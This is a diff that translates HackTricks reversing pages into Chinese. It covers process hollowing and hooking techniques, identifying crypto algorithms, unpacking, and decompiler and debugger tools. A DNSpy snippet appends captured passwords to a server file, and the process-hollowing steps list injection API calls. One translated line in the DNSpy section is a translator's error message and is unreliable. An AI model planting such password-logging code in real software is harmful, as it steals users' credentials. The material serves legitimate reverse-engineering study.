+可移植执行注入：可执行文件将被写入受害者进程的内存中，并从那里执行。
 
-### Process Hollowing
+### 进程空洞化
 
-The malware will unmap the legitimate code from memory of the process and load a malicious binary
+恶意软件将从进程的内存中取消映射合法代码并加载恶意二进制文件
 
-1. Create a new process: CreateProcess
-2. Unmap the memory: ZwUnmapViewOfSection, NtUnmapViewOfSection
-3. Write the malicious binary in the process memory: VirtualAllocEc, WriteProcessMemory
-4. Set the entrypoint and execute: SetThreadContext, ResumeThread
+1. 创建一个新进程：CreateProcess
+2. 取消映射内存：ZwUnmapViewOfSection, NtUnmapViewOfSection
+3. 在进程内存中写入恶意二进制文件：VirtualAllocEc, WriteProcessMemory
+4. 设置入口点并执行：SetThreadContext, ResumeThread
 
-## Hooking
+## 钩子
 
-- The **SSDT** (**System Service Descriptor Table**) points to kernel functions (ntoskrnl.exe) or GUI driver (win32k.sys) so user processes can call these functions.
-  - A rootkit may modify these pointer to addresses that he controls
-- **IRP** (**I/O Request Packets**) transmit pieces of data from one component to another. Almost everything in the kernel uses IRPs and each device object has its own function table that can be hooked: DKOM (Direct Kernel Object Manipulation)
-- The **IAT** (**Import Address Table**) is useful to resolve dependencies. It's possible to hook this table in order to hijack the code that will be called.
-- **EAT** (**Export Address Table**) Hooks. This hooks can be done from **userland**. The goal is to hook exported functions by DLLs.
-- **Inline Hooks**: This type are difficult to achieve. This involve modifying the code of the functions itself. Maybe by putting a jump at the beginning of this.
+- **SSDT** (**系统服务描述符表**) 指向内核函数 (ntoskrnl.exe) 或 GUI 驱动程序 (win32k.sys)，以便用户进程可以调用这些函数。
+- 根套件可能会修改这些指针以指向他控制的地址
+- **IRP** (**I/O 请求包**) 将数据片段从一个组件传输到另一个组件。几乎内核中的所有内容都使用 IRP，每个设备对象都有自己的函数表，可以被钩住：DKOM (直接内核对象操作)
+- **IAT** (**导入地址表**) 对于解析依赖关系非常有用。可以钩住此表以劫持将被调用的代码。
+- **EAT** (**导出地址表**) 钩子。此钩子可以从 **用户空间** 完成。目标是钩住 DLL 导出的函数。
+- **内联钩子**：这种类型的钩子很难实现。这涉及到修改函数本身的代码。可能通过在开头放置一个跳转来实现。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/cryptographic-algorithms/README.md b/src/reversing/cryptographic-algorithms/README.md
index 5b458b43e..e5ff9c2c0 100644
--- a/src/reversing/cryptographic-algorithms/README.md
+++ b/src/reversing/cryptographic-algorithms/README.md
@@ -1,186 +1,185 @@
-# Cryptographic/Compression Algorithms
+# 加密/压缩算法
 
-## Cryptographic/Compression Algorithms
+## 加密/压缩算法
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Identifying Algorithms
+## 识别算法
 
-If you ends in a code **using shift rights and lefts, xors and several arithmetic operations** it's highly possible that it's the implementation of a **cryptographic algorithm**. Here it's going to be showed some ways to **identify the algorithm that it's used without needing to reverse each step**.
+如果你在代码中**使用了右移和左移、异或以及几种算术操作**，那么它很可能是**加密算法**的实现。这里将展示一些**识别所使用算法的方法，而无需逐步反向工程**。
 
-### API functions
+### API 函数
 
 **CryptDeriveKey**
 
-If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
+如果使用了此函数，可以通过检查第二个参数的值来找到**所使用的算法**：
 
 ![](<../../images/image (375) (1) (1) (1) (1).png>)
 
-Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+在这里查看可能的算法及其分配值的表格：[https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
 **RtlCompressBuffer/RtlDecompressBuffer**
 
-Compresses and decompresses a given buffer of data.
+压缩和解压缩给定的数据缓冲区。
 
 **CryptAcquireContext**
 
-From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP.
+来自[文档](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta)：**CryptAcquireContext**函数用于获取特定加密服务提供程序（CSP）中某个密钥容器的句柄。**此返回的句柄用于调用使用所选CSP的CryptoAPI**函数。
 
 **CryptCreateHash**
 
-Initiates the hashing of a stream of data. If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
+初始化数据流的哈希。如果使用了此函数，可以通过检查第二个参数的值来找到**所使用的算法**：
 
 ![](<../../images/image (376).png>)
 
 \
-Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+在这里查看可能的算法及其分配值的表格：[https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
-### Code constants
+### 代码常量
 
-Sometimes it's really easy to identify an algorithm thanks to the fact that it needs to use a special and unique value.
+有时，由于需要使用特殊且唯一的值，识别算法非常简单。
 
 ![](<../../images/image (370).png>)
 
-If you search for the first constant in Google this is what you get:
+如果你在谷歌中搜索第一个常量，这就是你得到的结果：
 
 ![](<../../images/image (371).png>)
 
-Therefore, you can assume that the decompiled function is a **sha256 calculator.**\
-You can search any of the other constants and you will obtain (probably) the same result.
+因此，你可以假设反编译的函数是**sha256计算器**。\
+你可以搜索其他常量，可能会得到相同的结果。
 
-### data info
+### 数据信息
 
-If the code doesn't have any significant constant it may be **loading information from the .data section**.\
-You can access that data, **group the first dword** and search for it in google as we have done in the section before:
+如果代码没有任何显著的常量，它可能在**加载来自.data部分的信息**。\
+你可以访问该数据，**分组第一个dword**并在谷歌中搜索，就像我们在前面的部分所做的那样：
 
 ![](<../../images/image (372).png>)
 
-In this case, if you look for **0xA56363C6** you can find that it's related to the **tables of the AES algorithm**.
+在这种情况下，如果你搜索**0xA56363C6**，你会发现它与**AES算法的表**相关。
 
-## RC4 **(Symmetric Crypt)**
+## RC4 **(对称加密)**
 
-### Characteristics
+### 特点
 
-It's composed of 3 main parts:
+它由三个主要部分组成：
 
-- **Initialization stage/**: Creates a **table of values from 0x00 to 0xFF** (256bytes in total, 0x100). This table is commonly call **Substitution Box** (or SBox).
-- **Scrambling stage**: Will **loop through the table** crated before (loop of 0x100 iterations, again) creating modifying each value with **semi-random** bytes. In order to create this semi-random bytes, the RC4 **key is used**. RC4 **keys** can be **between 1 and 256 bytes in length**, however it is usually recommended that it is above 5 bytes. Commonly, RC4 keys are 16 bytes in length.
-- **XOR stage**: Finally, the plain-text or cyphertext is **XORed with the values created before**. The function to encrypt and decrypt is the same. For this, a **loop through the created 256 bytes** will be performed as many times as necessary. This is usually recognized in a decompiled code with a **%256 (mod 256)**.
+- **初始化阶段/**：创建一个**从0x00到0xFF的值表**（总共256字节，0x100）。这个表通常称为**替代盒**（或SBox）。
+- **打乱阶段**：将**循环遍历之前创建的表**（0x100次迭代的循环），用**半随机**字节修改每个值。为了创建这些半随机字节，使用RC4**密钥**。RC4**密钥**的长度可以**在1到256字节之间**，但通常建议长度超过5字节。通常，RC4密钥为16字节。
+- **异或阶段**：最后，明文或密文与**之前创建的值进行异或**。加密和解密的函数是相同的。为此，将根据需要对创建的256字节进行循环。通常，在反编译的代码中可以通过**%256（模256）**来识别。
 
 > [!NOTE]
-> **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)**
+> **为了在反汇编/反编译代码中识别RC4，你可以检查两个大小为0x100的循环（使用密钥），然后将输入数据与之前在两个循环中创建的256个值进行异或，可能使用%256（模256）**
 
-### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars)
+### **初始化阶段/替代盒：**（注意用作计数器的数字256，以及在256个字符的每个位置写入0的方式）
 
 ![](<../../images/image (377).png>)
 
-### **Scrambling Stage:**
+### **打乱阶段：**
 
 ![](<../../images/image (378).png>)
 
-### **XOR Stage:**
+### **异或阶段：**
 
 ![](<../../images/image (379).png>)
 
-## **AES (Symmetric Crypt)**
+## **AES (对称加密)**
 
-### **Characteristics**
+### **特点**
 
-- Use of **substitution boxes and lookup tables**
-  - It's possible to **distinguish AES thanks to the use of specific lookup table values** (constants). _Note that the **constant** can be **stored** in the binary **or created**_ _**dynamically**._
-- The **encryption key** must be **divisible** by **16** (usually 32B) and usually an **IV** of 16B is used.
+- 使用**替代盒和查找表**
+- 由于使用特定查找表值（常量），可以**区分AES**。_注意**常量**可以**存储**在二进制中**或动态**_**创建**。_
+- **加密密钥**必须是**16的倍数**（通常为32B），并且通常使用16B的**IV**。
 
-### SBox constants
+### SBox 常量
 
 ![](<../../images/image (380).png>)
 
-## Serpent **(Symmetric Crypt)**
+## Serpent **(对称加密)**
 
-### Characteristics
+### 特点
 
-- It's rare to find some malware using it but there are examples (Ursnif)
-- Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function)
+- 很少发现某些恶意软件使用它，但有例子（Ursnif）
+- 根据其长度（极长的函数）简单判断算法是否为Serpent
 
-### Identifying
+### 识别
 
-In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\
-Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example:
+在下图中注意常量**0x9E3779B9**的使用（注意该常量也被其他加密算法如**TEA** - Tiny Encryption Algorithm使用）。\
+还要注意**循环的大小**（**132**）和**反汇编**指令中的**异或操作**数量以及**代码**示例：
 
 ![](<../../images/image (381).png>)
 
-As it was mentioned before, this code can be visualized inside any decompiler as a **very long function** as there **aren't jumps** inside of it. The decompiled code can look like the following:
+如前所述，这段代码可以在任何反编译器中可视化为**非常长的函数**，因为其中**没有跳转**。反编译的代码可能看起来如下：
 
 ![](<../../images/image (382).png>)
 
-Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
+因此，可以通过检查**魔法数字**和**初始异或**来识别此算法，看到**非常长的函数**并**比较**一些**指令**与长函数的**实现**（如左移7和左旋转22）。
 
-## RSA **(Asymmetric Crypt)**
+## RSA **(非对称加密)**
 
-### Characteristics
+### 特点
 
-- More complex than symmetric algorithms
-- There are no constants! (custom implementation are difficult to determine)
-- KANAL (a crypto analyzer) fails to show hints on RSA ad it relies on constants.
+- 比对称算法更复杂
+- 没有常量！（自定义实现难以确定）
+- KANAL（加密分析器）未能显示RSA的提示，因为它依赖于常量。
 
-### Identifying by comparisons
+### 通过比较识别
 
 ![](<../../images/image (383).png>)
 
-- In line 11 (left) there is a `+7) >> 3` which is the same as in line 35 (right): `+7) / 8`
-- Line 12 (left) is checking if `modulus_len < 0x040` and in line 36 (right) it's checking if `inputLen+11 > modulusLen`
+- 在第11行（左侧）有一个`+7) >> 3`，与第35行（右侧）相同：`+7) / 8`
+- 第12行（左侧）检查`modulus_len < 0x040`，而第36行（右侧）检查`inputLen+11 > modulusLen`
 
-## MD5 & SHA (hash)
+## MD5 & SHA（哈希）
 
-### Characteristics
+### 特点
 
-- 3 functions: Init, Update, Final
-- Similar initialize functions
+- 3个函数：Init、Update、Final
+- 初始化函数相似
 
-### Identify
+### 识别
 
 **Init**
 
-You can identify both of them checking the constants. Note that the sha_init has 1 constant that MD5 doesn't have:
+你可以通过检查常量来识别它们。注意sha_init有一个MD5没有的常量：
 
 ![](<../../images/image (385).png>)
 
 **MD5 Transform**
 
-Note the use of more constants
+注意使用了更多常量
 
 ![](<../../images/image (253) (1) (1) (1).png>)
 
-## CRC (hash)
+## CRC（哈希）
 
-- Smaller and more efficient as it's function is to find accidental changes in data
-- Uses lookup tables (so you can identify constants)
+- 更小且更高效，因为它的功能是查找数据中的意外更改
+- 使用查找表（因此你可以识别常量）
 
-### Identify
+### 识别
 
-Check **lookup table constants**:
+检查**查找表常量**：
 
 ![](<../../images/image (387).png>)
 
-A CRC hash algorithm looks like:
+一个CRC哈希算法看起来像：
 
 ![](<../../images/image (386).png>)
 
-## APLib (Compression)
+## APLib（压缩）
 
-### Characteristics
+### 特点
 
-- Not recognizable constants
-- You can try to write the algorithm in python and search for similar things online
+- 没有可识别的常量
+- 你可以尝试用python编写算法并在线搜索类似的东西
 
-### Identify
+### 识别
 
-The graph is quiet large:
+图表相当大：
 
 ![](<../../images/image (207) (2) (1).png>)
 
-Check **3 comparisons to recognise it**:
+检查**3个比较以识别它**：
 
 ![](<../../images/image (384).png>)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/cryptographic-algorithms/unpacking-binaries.md b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
index 3320953a8..ed4e706fb 100644
--- a/src/reversing/cryptographic-algorithms/unpacking-binaries.md
+++ b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
@@ -1,25 +1,24 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Identifying packed binaries
+# 识别打包的二进制文件
 
-- **lack of strings**: It's common to find that packed binaries doesn't have almost any string
-- A lot of **unused strings**: Also, when a malware is using some kind of commercial packer it's common to find a lot of strings without cross-references. Even if these strings exist that doesn't mean that the binary isn't packed.
-- You can also use some tools to try to find which packer was used to pack a binary:
-  - [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml)
-  - [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml)
-  - [Language 2000](http://farrokhi.net/language/)
+- **缺少字符串**：常见的情况是打包的二进制文件几乎没有任何字符串。
+- 很多 **未使用的字符串**：此外，当恶意软件使用某种商业打包工具时，常常会发现很多没有交叉引用的字符串。即使这些字符串存在，也并不意味着二进制文件没有被打包。
+- 你还可以使用一些工具来尝试找出用于打包二进制文件的打包工具：
+- [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml)
+- [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml)
+- [Language 2000](http://farrokhi.net/language/)
 
-# Basic Recommendations
+# 基本建议
 
-- **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start.
-- Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it.
-- Put a **breakpoint** on `VirtualAlloc` as this allocates space in memory where the program can write unpacked code. The "run to user code" or use F8 to **get to value inside EAX** after executing the function and "**follow that address in dump**". You never know if that is the region where the unpacked code is going to be saved.
-  - **`VirtualAlloc`** with the value "**40**" as an argument means Read+Write+Execute (some code that needs execution is going to be copied here).
-- **While unpacking** code it's normal to find **several calls** to **arithmetic operations** and functions like **`memcopy`** or **`Virtual`**`Alloc`. If you find yourself in a function that apparently only perform arithmetic operations and maybe some `memcopy` , the recommendation is to try to **find the end of the function** (maybe a JMP or call to some register) **or** at least the **call to the last function** and run to then as the code isn't interesting.
-- While unpacking code **note** whenever you **change memory region** as a memory region change may indicate the **starting of the unpacking code**. You can easily dump a memory region using Process Hacker (process --> properties --> memory).
-- While trying to unpack code a good way to **know if you are already working with the unpacked code** (so you can just dump it) is to **check the strings of the binary**. If at some point you perform a jump (maybe changing the memory region) and you notice that **a lot more strings where added**, then you can know **you are working with the unpacked code**.\
-  However, if the packer already contains a lot of strings you can see how many strings contains the word "http" and see if this number increases.
-- When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases).
+- **从底部开始**分析打包的二进制文件**，在IDA中向上移动**。解包器在解包代码退出时退出，因此解包器不太可能在开始时将执行传递给解包的代码。
+- 搜索 **JMP** 或 **CALL** 到 **寄存器** 或 **内存区域**。还要搜索 **推送参数和地址方向的函数，然后调用 `retn`**，因为在这种情况下，函数的返回可能会调用在调用之前刚推送到堆栈的地址。
+- 在 `VirtualAlloc` 上设置 **断点**，因为这会在内存中分配程序可以写入解包代码的空间。使用“运行到用户代码”或使用 F8 **获取执行该函数后 EAX 中的值**，然后“**在转储中跟踪该地址**”。你永远不知道这是否是解包代码将要保存的区域。
+- **`VirtualAlloc`** 的参数值为 "**40**" 意味着可读+可写+可执行（一些需要执行的代码将被复制到这里）。
+- **在解包**代码时，通常会发现 **多个调用** 到 **算术操作** 和像 **`memcopy`** 或 **`Virtual`**`Alloc` 这样的函数。如果你发现自己在一个显然只执行算术操作的函数中，并且可能有一些 `memcopy`，建议尝试 **找到函数的结束**（可能是 JMP 或调用某个寄存器）**或**至少找到 **最后一个函数的调用**，然后运行到那里，因为代码并不有趣。
+- 在解包代码时，**注意**每当你 **更改内存区域**，因为内存区域的变化可能表示 **解包代码的开始**。你可以使用 Process Hacker 轻松转储内存区域（进程 --> 属性 --> 内存）。
+- 在尝试解包代码时，知道你是否已经在处理解包代码的好方法（这样你可以直接转储它）是 **检查二进制文件的字符串**。如果在某个时刻你执行了跳转（可能更改了内存区域），并且你注意到 **添加了更多字符串**，那么你可以知道 **你正在处理解包的代码**。\
+然而，如果打包工具已经包含了很多字符串，你可以查看包含“http”这个词的字符串数量，看看这个数字是否增加。
+- 当你从内存区域转储可执行文件时，可以使用 [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases) 修复一些头部信息。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md
index 09e8d9224..8db1b3e23 100644
--- a/src/reversing/reversing-tools-basic-methods/README.md
+++ b/src/reversing/reversing-tools-basic-methods/README.md
@@ -1,168 +1,158 @@
-# Reversing Tools & Basic Methods
+# 反向工具与基本方法
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## ImGui Based Reversing tools
+## 基于 ImGui 的反向工具
 
-Software:
+软件：
 
 - ReverseKit: [https://github.com/zer0condition/ReverseKit](https://github.com/zer0condition/ReverseKit)
 
-## Wasm decompiler / Wat compiler
+## Wasm 反编译器 / Wat 编译器
 
-Online:
+在线：
 
-- Use [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) to **decompile** from wasm (binary) to wat (clear text)
-- Use [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) to **compile** from wat to wasm
-- you can also try to use [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) to decompile
+- 使用 [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) **反编译** 从 wasm（二进制）到 wat（明文）
+- 使用 [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) **编译** 从 wat 到 wasm
+- 你也可以尝试使用 [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) 进行反编译
 
-Software:
+软件：
 
 - [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
 - [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
 
-## .NET decompiler
+## .NET 反编译器
 
 ### [dotPeek](https://www.jetbrains.com/decompiler/)
 
-dotPeek is a decompiler that **decompiles and examines multiple formats**, including **libraries** (.dll), **Windows metadata file**s (.winmd), and **executables** (.exe). Once decompiled, an assembly can be saved as a Visual Studio project (.csproj).
+dotPeek 是一个反编译器，**反编译并检查多种格式**，包括 **库** (.dll)、**Windows 元数据文件** (.winmd) 和 **可执行文件** (.exe)。反编译后，程序集可以保存为 Visual Studio 项目 (.csproj)。
 
-The merit here is that if a lost source code requires restoration from a legacy assembly, this action can save time. Further, dotPeek provides handy navigation throughout the decompiled code, making it one of the perfect tools for **Xamarin algorithm analysis.**
+其优点在于，如果丢失的源代码需要从遗留程序集恢复，此操作可以节省时间。此外，dotPeek 提供了便捷的导航功能，使其成为 **Xamarin 算法分析** 的完美工具之一。
 
 ### [.NET Reflector](https://www.red-gate.com/products/reflector/)
 
-With a comprehensive add-in model and an API that extends the tool to suit your exact needs, .NET reflector saves time and simplifies development. Let's take a look at the plethora of reverse engineering services this tool provides:
+通过全面的插件模型和扩展工具以满足您确切需求的 API，.NET Reflector 节省时间并简化开发。让我们看看这个工具提供的众多逆向工程服务：
 
-- Provides an insight into how the data flows through a library or component
-- Provides insight into the implementation and usage of .NET languages and frameworks
-- Finds undocumented and unexposed functionality to get more out of the APIs and technologies used.
-- Finds dependencies and different assemblies
-- Tracks down the exact location of errors in your code, third-party components, and libraries.
-- Debugs into the source of all the .NET code you work with.
+- 提供对数据如何在库或组件中流动的洞察
+- 提供对 .NET 语言和框架的实现和使用的洞察
+- 查找未记录和未公开的功能，以便更好地利用所使用的 API 和技术
+- 查找依赖关系和不同的程序集
+- 精确定位代码、第三方组件和库中的错误
+- 调试您所使用的所有 .NET 代码的源头
 
-### [ILSpy](https://github.com/icsharpcode/ILSpy) & [dnSpy](https://github.com/dnSpy/dnSpy/releases)
+### [ILSpy](https://github.com/icsharpcode/ILSpy) 和 [dnSpy](https://github.com/dnSpy/dnSpy/releases)
 
-[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\
-If you need to **decompile**, **modify** and **recompile** again you can use [**dnSpy**](https://github.com/dnSpy/dnSpy/releases) or an actively maintained fork of it, [**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases). (**Right Click -> Modify Method** to change something inside a function).
+[ILSpy 插件用于 Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode)：您可以在任何操作系统上使用它（您可以直接从 VSCode 安装，无需下载 git。点击 **扩展** 并 **搜索 ILSpy**）。\
+如果您需要 **反编译**、**修改** 和 **重新编译**，可以使用 [**dnSpy**](https://github.com/dnSpy/dnSpy/releases) 或其一个积极维护的分支 [**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)。（**右键点击 -> 修改方法** 以更改函数内部的内容）。
 
-### DNSpy Logging
-
-In order to make **DNSpy log some information in a file**, you could use this snippet:
+### DNSpy 日志记录
 
+为了让 **DNSpy 在文件中记录一些信息**，您可以使用以下代码片段：
 ```cs
 using System.IO;
 path = "C:\\inetpub\\temp\\MyTest2.txt";
 File.AppendAllText(path, "Password: " + password + "\n");
 ```
+### DNSpy 调试
 
-### DNSpy Debugging
+要使用 DNSpy 调试代码，您需要：
 
-In order to debug code using DNSpy you need to:
-
-First, change the **Assembly attributes** related to **debugging**:
+首先，修改与 **调试** 相关的 **程序集属性**：
 
 ![](<../../images/image (973).png>)
-
-From:
-
 ```aspnet
 [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
 ```
-
-To:
-
+翻译内容缺失，请提供需要翻译的文本。
 ```
 [assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
 DebuggableAttribute.DebuggingModes.DisableOptimizations |
 DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
 DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
 ```
-
-And click on **compile**:
+然后点击 **compile**：
 
 ![](<../../images/image (314) (1).png>)
 
-Then save the new file via _**File >> Save module...**_:
+然后通过 _**File >> Save module...**_ 保存新文件：
 
 ![](<../../images/image (602).png>)
 
-This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
-
-Then, if your .NET application is being **run** by **IIS** you can **restart** it with:
+这是必要的，因为如果不这样做，在 **runtime** 时会对代码应用多个 **optimisations**，可能会导致在调试时 **break-point 从未被触发** 或某些 **variables 不存在**。
 
+然后，如果你的 .NET 应用程序是由 **IIS** 运行的，你可以通过以下方式 **restart** 它：
 ```
 iisreset /noforce
 ```
-
-Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**:
+然后，为了开始调试，您应该关闭所有打开的文件，并在 **Debug Tab** 中选择 **Attach to Process...**：
 
 ![](<../../images/image (318).png>)
 
-Then select **w3wp.exe** to attach to the **IIS server** and click **attach**:
+然后选择 **w3wp.exe** 以附加到 **IIS server** 并点击 **attach**：
 
 ![](<../../images/image (113).png>)
 
-Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug >> Break All_ and then click on _**Debug >> Windows >> Modules**_:
+现在我们正在调试该进程，是时候停止它并加载所有模块。首先点击 _Debug >> Break All_，然后点击 _**Debug >> Windows >> Modules**_：
 
 ![](<../../images/image (132).png>)
 
 ![](<../../images/image (834).png>)
 
-Click any module on **Modules** and select **Open All Modules**:
+在 **Modules** 中点击任何模块并选择 **Open All Modules**：
 
 ![](<../../images/image (922).png>)
 
-Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
+在 **Assembly Explorer** 中右键点击任何模块并点击 **Sort Assemblies**：
 
 ![](<../../images/image (339).png>)
 
-## Java decompiler
+## Java 反编译器
 
 [https://github.com/skylot/jadx](https://github.com/skylot/jadx)\
 [https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
 
-## Debugging DLLs
+## 调试 DLL
 
-### Using IDA
+### 使用 IDA
 
-- **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
-- Select **Windbg** debugger
-- Select "**Suspend on library load/unload**"
+- **加载 rundll32**（64位在 C:\Windows\System32\rundll32.exe，32位在 C:\Windows\SysWOW64\rundll32.exe）
+- 选择 **Windbg** 调试器
+- 选择 "**Suspend on library load/unload**"
 
 ![](<../../images/image (868).png>)
 
-- Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call:
+- 配置执行的 **参数**，输入 **DLL 的路径** 和您想要调用的函数：
 
 ![](<../../images/image (704).png>)
 
-Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
+然后，当您开始调试时，**每个 DLL 加载时执行将被停止**，然后，当 rundll32 加载您的 DLL 时，执行将被停止。
 
-But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
+但是，您如何才能到达已加载的 DLL 的代码呢？使用这种方法，我不知道怎么做。
 
-### Using x64dbg/x32dbg
+### 使用 x64dbg/x32dbg
 
-- **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
-- **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii_2.dll",DLLMain
-- Change _Options --> Settings_ and select "**DLL Entry**".
-- Then **start the execution**, the debugger will stop at each dll main, at some point you will **stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint.
+- **加载 rundll32**（64位在 C:\Windows\System32\rundll32.exe，32位在 C:\Windows\SysWOW64\rundll32.exe）
+- **更改命令行**（ _File --> Change Command Line_ ）并设置 DLL 的路径和您想要调用的函数，例如："C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii_2.dll",DLLMain
+- 更改 _Options --> Settings_ 并选择 "**DLL Entry**"。
+- 然后 **开始执行**，调试器将在每个 DLL 主函数处停止，在某个时刻您将 **停在您的 DLL 的 DLL Entry**。从那里，只需搜索您想要放置断点的点。
 
-Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**:
+请注意，当执行因任何原因在 win64dbg 中停止时，您可以在 **win64dbg 窗口顶部** 查看 **您正在查看的代码**：
 
 ![](<../../images/image (842).png>)
 
-Then, looking to this ca see when the execution was stopped in the dll you want to debug.
+然后，查看此处可以看到执行在您想要调试的 DLL 中停止。
 
-## GUI Apps / Videogames
+## GUI 应用程序 / 视频游戏
 
-[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in:
+[**Cheat Engine**](https://www.cheatengine.org/downloads.php) 是一个有用的程序，可以找到在运行游戏的内存中保存的重要值并更改它们。更多信息请参见：
 
 {{#ref}}
 cheat-engine.md
 {{#endref}}
 
-[**PiNCE**](https://github.com/korcankaraokcu/PINCE) is a front-end/reverse engineering tool for the GNU Project Debugger (GDB), focused on games. However, it can be used for any reverse-engineering related stuff
+[**PiNCE**](https://github.com/korcankaraokcu/PINCE) 是一个针对 GNU Project Debugger (GDB) 的前端/逆向工程工具，专注于游戏。然而，它可以用于任何与逆向工程相关的内容。
 
-[**Decompiler Explorer**](https://dogbolt.org/) is a web front-end to a number of decompilers. This web service lets you compare the output of different decompilers on small executables.
+[**Decompiler Explorer**](https://dogbolt.org/) 是多个反编译器的网页前端。该网络服务允许您比较不同反编译器在小型可执行文件上的输出。
 
 ## ARM & MIPS
 
@@ -170,49 +160,48 @@ cheat-engine.md
 
 ## Shellcodes
 
-### Debugging a shellcode with blobrunner
+### 使用 blobrunner 调试 shellcode
 
-[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\
-Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode.
